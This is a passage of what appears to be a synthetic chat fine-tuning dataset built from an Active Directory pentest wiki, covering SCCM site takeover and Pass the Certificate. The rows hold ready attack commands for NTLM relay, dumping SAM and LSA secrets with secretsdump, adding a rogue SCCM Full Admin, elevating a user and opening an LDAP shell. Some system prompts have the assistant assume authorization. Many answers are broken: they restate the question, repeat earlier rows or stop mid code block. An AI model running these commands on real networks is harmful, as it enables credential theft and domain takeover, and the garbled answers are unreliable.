`ntlmrelayx.py -t $ACTIVE_SERVER.$DOMAIN -smb2support -socks`?"}, {"role": "assistant", "content": "This command is used for sccm site takeover - step 1: setup an ntlm relay server. Step 1: setup an NTLM relay server"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ntlmrelayx.py -t $ACTIVE_SERVER.$DOMAIN -smb2support -socks`?", "response": "This command is used for sccm site takeover - step 1: setup an ntlm relay server. Step 1: setup an NTLM relay server", "metadata": {"corpus_index": 1102, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe SCCM site takeover - Step 2: authentication coercion in the context of penetration testing"}, {"role": "assistant", "content": "The passive site server's authentication can be coerced with (PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc.).\n\nIf the NTLM relay attack is a success and ntlmrelayx.py has effectively sent the request to the active server, a SMB session through socks proxy has been opened with administrative rights."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe SCCM site takeover - Step 2: authentication coercion in the context of penetration testing", "response": "The passive site server's authentication can be coerced with (PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc.).\n\nIf the NTLM relay attack is a success and ntlmrelayx.py has effectively sent the request to the active server, a SMB session through socks proxy has been opened with administrative rights.", "metadata": {"corpus_index": 1103, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out SCCM site takeover - Step 2: authentication coercion during a pentest?"}, {"role": "assistant", "content": "The passive site server's authentication can be coerced with (PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc.).\n\nIf the NTLM relay attack is a success and ntlmrelayx.py has effectively sent the request to the active server, a SMB session through socks proxy has been opened with administrative rights."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out SCCM site takeover - Step 2: authentication coercion during a pentest?", "response": "The passive site server's authentication can be coerced with (PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc.).\n\nIf the NTLM relay attack is a success and ntlmrelayx.py has effectively sent the request to the active server, a SMB session through socks proxy has been opened with administrative rights.", "metadata": {"corpus_index": 1103, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does SCCM site takeover - Step 3: dump active site server account credentials work?"}, {"role": "assistant", "content": "Through the socks session, it is possible to dump the local credentials stored in the SAM database, and the secrets from the LSA, with Impacket's secretsdump.py (Python).\n\n``bash\nproxychains4 secretsdump.py $DOMAIN/$PASSIVE_SERVER\\$@$ACTIVE_SERVER.$DOMAIN\n``\n\nRetrieve the LM:NT hash of the server account."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does SCCM site takeover - Step 3: dump active site server account credentials work?", "response": "Through the socks session, it is possible to dump the local credentials stored in the SAM database, and the secrets from the LSA, with Impacket's secretsdump.py (Python).\n\n``bash\nproxychains4 secretsdump.py $DOMAIN/$PASSIVE_SERVER\\$@$ACTIVE_SERVER.$DOMAIN\n``\n\nRetrieve the LM:NT hash of the server account.", "metadata": {"corpus_index": 1104, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out SCCM site takeover - Step 3: dump active site server account credentials during a pentest?"}, {"role": "assistant", "content": "Through the socks session, it is possible to dump the local credentials stored in the SAM database, and the secrets from the LSA, with Impacket's secretsdump.py (Python).\n\n``bash\nproxychains4 secretsdump.py $DOMAIN/$PASSIVE_SERVER\\$@$ACTIVE_SERVER.$DOMAIN\n``\n\nRetrieve the LM:NT hash of the server account."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out SCCM site takeover - Step 3: dump active site server account credentials during a pentest?", "response": "Through the socks session, it is possible to dump the local credentials stored in the SAM database, and the secrets from the LSA, with Impacket's secretsdump.py (Python).\n\n``bash\nproxychains4 secretsdump.py $DOMAIN/$PASSIVE_SERVER\\$@$ACTIVE_SERVER.$DOMAIN\n``\n\nRetrieve the LM:NT hash of the server account.", "metadata": {"corpus_index": 1104, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the proxychains4 syntax for sccm site takeover - step 3: dump active site server account credentials?"}, {"role": "assistant", "content": "proxychains4 secretsdump.py $DOMAIN/$PASSIVE_SERVER\\$@$ACTIVE_SERVER.$DOMAIN"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the proxychains4 syntax for sccm site takeover - step 3: dump active site server account credentials?", "response": "proxychains4 secretsdump.py $DOMAIN/$PASSIVE_SERVER\\$@$ACTIVE_SERVER.$DOMAIN", "metadata": {"corpus_index": 1105, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "proxychains4"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do SCCM site takeover - Step 3: dump active site server account credentials"}, {"role": "assistant", "content": "proxychains4 secretsdump.py $DOMAIN/$PASSIVE_SERVER\\$@$ACTIVE_SERVER.$DOMAIN"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do SCCM site takeover - Step 3: dump active site server account credentials", "response": "proxychains4 secretsdump.py $DOMAIN/$PASSIVE_SERVER\\$@$ACTIVE_SERVER.$DOMAIN", "metadata": {"corpus_index": 1105, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `proxychains4 secretsdump.py $DOMAIN/$PASSIVE_SERVER\\$@$ACTIVE_SERVER.$DOMAIN`?"}, {"role": "assistant", "content": "This command is used for sccm site takeover - step 3: dump active site server account credentials. Step 3: dump active site server account credentials"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `proxychains4 secretsdump.py $DOMAIN/$PASSIVE_SERVER\\$@$ACTIVE_SERVER.$DOMAIN`?", "response": "This command is used for sccm site takeover - step 3: dump active site server account credentials. Step 3: dump active site server account credentials", "metadata": {"corpus_index": 1105, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does SCCM site takeover - Step 4: add a new SCCM Full Admin work?"}, {"role": "assistant", "content": "Since the active site server must be a member of the SMS Provider administrators (it is member of the SMS Admins group), its credentials can be used to add a new controlled user to the Full Admin SCCM group. sccmhunter (Python) can be used for this purpose.\n\n``bash\nsccmhunter.py admin -u $ACTIVE_SERVER\\$ -p $LMHASH:NTHASH -ip $SMS_PROVIDER_IP\n\n() (C:\\) >> add_admin controlledUser \n() (C:\\) >> show_admins\n``\n\nPost exploitation via SCCM can now be performed on the network.\n\n> [!CAUTION]\n> The tool author (Chris Thompson) warns that SharpSCCM is a PoC only tested in lab. One should be careful when running in production environments."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does SCCM site takeover - Step 4: add a new SCCM Full Admin work?", "response": "Since the active site server must be a member of the SMS Provider administrators (it is member of the SMS Admins group), its credentials can be used to add a new controlled user to the Full Admin SCCM group. sccmhunter (Python) can be used for this purpose.\n\n``bash\nsccmhunter.py admin -u $ACTIVE_SERVER\\$ -p $LMHASH:NTHASH -ip $SMS_PROVIDER_IP\n\n() (C:\\) >> add_admin controlledUser \n() (C:\\) >> show_admins\n``\n\nPost exploitation via SCCM can now be performed on the network.\n\n> [!CAUTION]\n> The tool author (Chris Thompson) warns that SharpSCCM is a PoC only tested in lab. One should be careful when running in production environments.", "metadata": {"corpus_index": 1106, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through SCCM site takeover - Step 4: add a new SCCM Full Admin"}, {"role": "assistant", "content": "Since the active site server must be a member of the SMS Provider administrators (it is member of the SMS Admins group), its credentials can be used to add a new controlled user to the Full Admin SCCM group. sccmhunter (Python) can be used for this purpose.\n\n``bash\nsccmhunter.py admin -u $ACTIVE_SERVER\\$ -p $LMHASH:NTHASH -ip $SMS_PROVIDER_IP\n\n() (C:\\) >> add_admin controlledUser \n() (C:\\) >> show_admins\n``\n\nPost exploitation via SCCM can now be performed on the network.\n\n> [!CAUTION]\n> The tool author (Chris Thompson) warns that SharpSCCM is a PoC only tested in lab. One should be careful when running in production environments."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through SCCM site takeover - Step 4: add a new SCCM Full Admin", "response": "Since the active site server must be a member of the SMS Provider administrators (it is member of the SMS Admins group), its credentials can be used to add a new controlled user to the Full Admin SCCM group. sccmhunter (Python) can be used for this purpose.\n\n``bash\nsccmhunter.py admin -u $ACTIVE_SERVER\\$ -p $LMHASH:NTHASH -ip $SMS_PROVIDER_IP\n\n() (C:\\) >> add_admin controlledUser \n() (C:\\) >> show_admins\n``\n\nPost exploitation via SCCM can now be performed on the network.\n\n> [!CAUTION]\n> The tool author (Chris Thompson) warns that SharpSCCM is a PoC only tested in lab. One should be careful when running in production environments.", "metadata": {"corpus_index": 1106, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the sccmhunter.py command to sccm site takeover - step 4: add a new sccm full admin"}, {"role": "assistant", "content": "sccmhunter.py admin -u $ACTIVE_SERVER\\$ -p $LMHASH:NTHASH -ip $SMS_PROVIDER_IP\n\n() (C:\\) >> add_admin controlledUser \n() (C:\\) >> show_admins"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the sccmhunter.py command to sccm site takeover - step 4: add a new sccm full admin", "response": "sccmhunter.py admin -u $ACTIVE_SERVER\\$ -p $LMHASH:NTHASH -ip $SMS_PROVIDER_IP\n\n() (C:\\) >> add_admin controlledUser \n() (C:\\) >> show_admins", "metadata": {"corpus_index": 1107, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "sccmhunter.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on SCCM site takeover - Step 4: add a new SCCM Full Admin"}, {"role": "assistant", "content": "sccmhunter.py admin -u $ACTIVE_SERVER\\$ -p $LMHASH:NTHASH -ip $SMS_PROVIDER_IP\n\n() (C:\\) >> add_admin controlledUser \n() (C:\\) >> show_admins"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on SCCM site takeover - Step 4: add a new SCCM Full Admin", "response": "sccmhunter.py admin -u $ACTIVE_SERVER\\$ -p $LMHASH:NTHASH -ip $SMS_PROVIDER_IP\n\n() (C:\\) >> add_admin controlledUser \n() (C:\\) >> show_admins", "metadata": {"corpus_index": 1107, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `sccmhunter.py admin -u $ACTIVE_SERVER\\$ -p $LMHASH:NTHASH -ip $SMS_PROVIDER_IP`?"}, {"role": "assistant", "content": "This command is used for sccm site takeover - step 4: add a new sccm full admin. Step 4: add a new SCCM Full Admin"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `sccmhunter.py admin -u $ACTIVE_SERVER\\$ -p $LMHASH:NTHASH -ip $SMS_PROVIDER_IP`?", "response": "This command is used for sccm site takeover - step 4: add a new sccm full admin. Step 4: add a new SCCM Full Admin", "metadata": {"corpus_index": 1107, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/privilege-escalation/site-takeover.md", "page_title": "SCCM site takeover", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Pass the Certificate"}, {"role": "assistant", "content": "> [!NOTE]\n> This technique extends the notion of Pass the Certificate, thus dubbed by myself, @_nwodtuhs, in a Twitter thread about AD CS and PKINIT here. Even if both techniques share the same name and the same concept, the authentication method is different."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Pass the Certificate", "response": "> [!NOTE]\n> This technique extends the notion of Pass the Certificate, thus dubbed by myself, @_nwodtuhs, in a Twitter thread about AD CS and PKINIT here. Even if both techniques share the same name and the same concept, the authentication method is different.", "metadata": {"corpus_index": 1108, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Pass the Certificate"}, {"role": "assistant", "content": "> [!NOTE]\n> This technique extends the notion of Pass the Certificate, thus dubbed by myself, @_nwodtuhs, in a Twitter thread about AD CS and PKINIT here. Even if both techniques share the same name and the same concept, the authentication method is different."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Pass the Certificate", "response": "> [!NOTE]\n> This technique extends the notion of Pass the Certificate, thus dubbed by myself, @_nwodtuhs, in a Twitter thread about AD CS and PKINIT here. Even if both techniques share the same name and the same concept, the authentication method is different.", "metadata": {"corpus_index": 1108, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Pass the Certificate - Theory"}, {"role": "assistant", "content": "Sometimes, Domain Controllers do not support PKINIT. This can be because their certificates do not have the Smart Card Logon EKU. Most of the time, domain controllers return KDC_ERR_PADATA_TYPE_NOSUPP error when the EKU is missing. Fortunately, several protocols — including LDAP — support Schannel, thus authentication through TLS. As the term \"schannel authentication\" is derived from the Schannel SSP (Security Service Provider) which is the Microsoft SSL/TLS implementation in Windows, it is important to note that schannel authentication is a SSL/TLS client authentication.\n\n> [!TIP]\n> * Schannel authentication relies on TLS so it is, by design, not subject to channel binding, as the authentication is borne by TLS itself.\n> * Schannel is not subject to LDAP signing either as the bind is performed after a StartTLS command when used on the LDAP TCP port."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Pass the Certificate - Theory", "response": "Sometimes, Domain Controllers do not support PKINIT. This can be because their certificates do not have the Smart Card Logon EKU. Most of the time, domain controllers return KDC_ERR_PADATA_TYPE_NOSUPP error when the EKU is missing. Fortunately, several protocols — including LDAP — support Schannel, thus authentication through TLS. As the term \"schannel authentication\" is derived from the Schannel SSP (Security Service Provider) which is the Microsoft SSL/TLS implementation in Windows, it is important to note that schannel authentication is a SSL/TLS client authentication.\n\n> [!TIP]\n> * Schannel authentication relies on TLS so it is, by design, not subject to channel binding, as the authentication is borne by TLS itself.\n> * Schannel is not subject to LDAP signing either as the bind is performed after a StartTLS command when used on the LDAP TCP port.", "metadata": {"corpus_index": 1109, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Pass the Certificate - Theory?"}, {"role": "assistant", "content": "Sometimes, Domain Controllers do not support PKINIT. This can be because their certificates do not have the Smart Card Logon EKU. Most of the time, domain controllers return KDC_ERR_PADATA_TYPE_NOSUPP error when the EKU is missing. Fortunately, several protocols — including LDAP — support Schannel, thus authentication through TLS. As the term \"schannel authentication\" is derived from the Schannel SSP (Security Service Provider) which is the Microsoft SSL/TLS implementation in Windows, it is important to note that schannel authentication is a SSL/TLS client authentication.\n\n> [!TIP]\n> * Schannel authentication relies on TLS so it is, by design, not subject to channel binding, as the authentication is borne by TLS itself.\n> * Schannel is not subject to LDAP signing either as the bind is performed after a StartTLS command when used on the LDAP TCP port."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Pass the Certificate - Theory?", "response": "Sometimes, Domain Controllers do not support PKINIT. This can be because their certificates do not have the Smart Card Logon EKU. Most of the time, domain controllers return KDC_ERR_PADATA_TYPE_NOSUPP error when the EKU is missing. Fortunately, several protocols — including LDAP — support Schannel, thus authentication through TLS. As the term \"schannel authentication\" is derived from the Schannel SSP (Security Service Provider) which is the Microsoft SSL/TLS implementation in Windows, it is important to note that schannel authentication is a SSL/TLS client authentication.\n\n> [!TIP]\n> * Schannel authentication relies on TLS so it is, by design, not subject to channel binding, as the authentication is borne by TLS itself.\n> * Schannel is not subject to LDAP signing either as the bind is performed after a StartTLS command when used on the LDAP TCP port.", "metadata": {"corpus_index": 1109, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Pass the Certificate - Practice work?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nTools like PassTheCert (python version) and Certipy can be used to authenticate with the certificate via Schannel against LDAP.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Pass the Certificate - Practice work?", "response": "::: tabs\n\n=== UNIX-like\n\nTools like PassTheCert (python version) and Certipy can be used to authenticate with the certificate via Schannel against LDAP.\n\n```bash", "metadata": {"corpus_index": 1110, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Pass the Certificate - Practice?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nTools like PassTheCert (python version) and Certipy can be used to authenticate with the certificate via Schannel against LDAP.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Pass the Certificate - Practice?", "response": "::: tabs\n\n=== UNIX-like\n\nTools like PassTheCert (python version) and Certipy can be used to authenticate with the certificate via Schannel against LDAP.\n\n```bash", "metadata": {"corpus_index": 1110, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does If you use Certipy to retrieve certificates, you can extract key and cert from the pfx by using: work?"}, {"role": "assistant", "content": "$ certipy cert -pfx user.pfx -nokey -out user.crt\n$ certipy cert -pfx user.pfx -nocert -out user.key"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does If you use Certipy to retrieve certificates, you can extract key and cert from the pfx by using: work?", "response": "$ certipy cert -pfx user.pfx -nokey -out user.crt\n$ certipy cert -pfx user.pfx -nocert -out user.key", "metadata": {"corpus_index": 1111, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through If you use Certipy to retrieve certificates, you can extract key and cert from the pfx by using:"}, {"role": "assistant", "content": "$ certipy cert -pfx user.pfx -nokey -out user.crt\n$ certipy cert -pfx user.pfx -nocert -out user.key"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through If you use Certipy to retrieve certificates, you can extract key and cert from the pfx by using:", "response": "$ certipy cert -pfx user.pfx -nokey -out user.crt\n$ certipy cert -pfx user.pfx -nocert -out user.key", "metadata": {"corpus_index": 1111, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does elevate a user (it assumes that the domain account for which the certificate was issued, holds privileges to elevate user) work?"}, {"role": "assistant", "content": "passthecert.py -action modify_user -crt user.crt -key user.key -domain domain.local -dc-ip \"10.0.0.1\" -target user_sam -elevate"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does elevate a user (it assumes that the domain account for which the certificate was issued, holds privileges to elevate user) work?", "response": "passthecert.py -action modify_user -crt user.crt -key user.key -domain domain.local -dc-ip \"10.0.0.1\" -target user_sam -elevate", "metadata": {"corpus_index": 1112, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out elevate a user (it assumes that the domain account for which the certificate was issued, holds privileges to elevate user) during a pentest?"}, {"role": "assistant", "content": "passthecert.py -action modify_user -crt user.crt -key user.key -domain domain.local -dc-ip \"10.0.0.1\" -target user_sam -elevate"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out elevate a user (it assumes that the domain account for which the certificate was issued, holds privileges to elevate user) during a pentest?", "response": "passthecert.py -action modify_user -crt user.crt -key user.key -domain domain.local -dc-ip \"10.0.0.1\" -target user_sam -elevate", "metadata": {"corpus_index": 1112, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe spawn a LDAP shell in the context of penetration testing"}, {"role": "assistant", "content": "passthecert.py -action ldap-shell -crt user.crt -key user.key -domain domain.local -dc-ip \"10.0.0.1\"\ncertipy auth -pfx -dc-ip \"10.0.0.1\" -ldap-shell\n``\n\n=== Windows\n\nPass the cert technique can be done with PassTheCert (C# version).\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe spawn a LDAP shell in the context of penetration testing", "response": "passthecert.py -action ldap-shell -crt user.crt -key user.key -domain domain.local -dc-ip \"10.0.0.1\"\ncertipy auth -pfx -dc-ip \"10.0.0.1\" -ldap-shell\n``\n\n=== Windows\n\nPass the cert technique can be done with PassTheCert (C# version).\n\n``bash", "metadata": {"corpus_index": 1113, "category": "active_directory", "source_file": "docs/src/ad/movement/schannel/passthecert.md", "page_title": "Pass the Certificate", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do spawn a LDAP shell"}, {"role": "assistant", "content": "passthecert.py -action ldap-shell -crt user.crt -key user.key -domain domain.local -dc-ip \"10.0.0.1\"\ncertipy auth -pfx -dc-ip \"10.0.0.1\" -ldap-shell\n``\n\n=== Windows\n\nPass the cert technique can be done with PassTheCert (C# version).\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security 